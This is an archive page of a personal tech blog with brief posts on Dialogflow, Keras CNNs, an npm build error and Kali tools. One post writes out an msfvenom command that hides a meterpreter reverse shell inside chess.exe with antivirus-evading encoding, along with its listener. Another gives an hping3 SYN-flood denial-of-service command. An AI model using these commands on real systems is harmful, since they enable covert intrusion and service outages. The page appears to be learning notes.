Showing posts from June, 2018

working with dialogflow using google cloud sdk libraries

Google provides a comprehensive set of client libraries for working with dialogflow. Languages supported includes  C#, Go, Java, Node, PHP, Python and Ruby as can be downloaded from the link here.

You can list, create and delete intent.

Detail documentation can be found from the same link.

google dialog flow - importing and exporting code

User are able to import and export code, by going into Dialogflow Console. Then click on the "Gear" -> Export and Import -> as shown in diagram below :-


msfvenom creating a reverse shell and evading payload from av

There are two types of shell namely bind and reverse shell. Bind shell creates a new service  and attacker connect to this service.

Reverse shell on the other hand, is triggered by the user while an attacker runs some listener and target machine.

msfvenom allows hacker to create / re-create a payload and hide it from AV detection.

The command below, hides our payload / attack using reverse_tcp using an encoder called shikata_ga_nai into a file called chess.exe.

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x /usr/share/chess.exe -e x86/shikata_ga_nai -i 200 -f exe >chess.exe

To listen to any victim, we will issue the following commands :-

msf >use exploit/multi/handler

msf > set payload windows/meterpreter/reverse_tcp

hping3 - packet crafting

Hping3 is a ping command but slightly more advance.

Simple use case scenario

Get traceroute for a host

hping3 --traceroute -V -1
Sends a Syn packet to port 80.
hping3 -V -S -p 80

Advance use case scenario

xmas scan

hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF
null scan - if target port is closed, it sends TCP RST. If it is open, the target discard TCP NULL scan, sending no reply
hping3 -c 1 -V -p 80 -s 5050 -Y
DOS Lan Attack 

hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP--flood: sent packets as fast as possible. Don't show replies.--rand-dest: random destionation address mode. see the man.-V <-- li="" verbose=""> -c --count: packet count-d --data: data size-S --syn: set SYN flag-w --win: winsize (default 64)-p --destport [+][+] destination port(default 0) ctrl+z inc/dec-s --baseport: base source port (default random)

zenmap commonly used for scanning a network

zenmap is a port scanning tool. To fire this up in Kali Linux, goto Application -> Information Gathering -> ZenMap UI.

Commonly used command :-

a) nmap

send TCP SYNC to 1000 common ports. Also send imcp echo request to check if server is up

b) nmap -O

identify operating system of the host

c) nmap -sL

Do a simple DNS query for a specified ip and discover hostname in a network without querying individually servers in a network

d) nmap -sS -sU -PN -

-sS is a stealth scan

-sU initiates a UDP scan

e) nmap -T4 -A

Performs aggressive scanning with -A option

f) nmap -T4 -F -v

Performs a fast scan with -F option while -v means verbose.

cnn from scratch with keras - code review

This post gives a working sample of training neutral net with cnn in keras.

CNN setup is based on Yan LeCun configuration.

model = Sequential() model.add(Conv2D(32, (3, 3), input_shape=input_shape)) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(32, (3, 3))) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3))) model.add(Activation('relu')) model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten()) model.add(Dense(64)) model.add(Activation('relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid'))

model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=['accuracy'])

validation_generator = test_datagen.flow_from_directory( validation_data_dir, target_size=(img_width, img_height), batch_size=batch_size, class_mode='binary')
test_datagen is of type ImageDataGenerator which helps with gen…

"C:\Microsoft.Cpp.Default.props" was not found.

I was getting this error when running npm install.

The imported project "C:\Microsoft.Cpp.Default.props" was not found. Confirm that the path in the declaration is correct, and that the file exists on disk.
Solution :-

SET VCTargetsPath=C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\v140

Thanks to Stackoverflow for this answer! :)

understanding keras 's layer

dot - computes a dot product between 2 tensors. Just like doing multiplication.

conv2d - creates a convulsion - a square box that you hover over a 2d image matrix.

maxPool2d - taking the max values out of a stride after we iterate our image with a predefined filter size. Small little window walks through our image to produce a matrix - which made up of biggest value of a filter.

To see more please read from this link here.

dense layer - it is a linear function which maps input directly to output based on a predefined weight. sometimes weight can be a softmax function.

dropout is a techniques used to prevent over fitting in neural network. Performs averaging and prevent co-adaptions.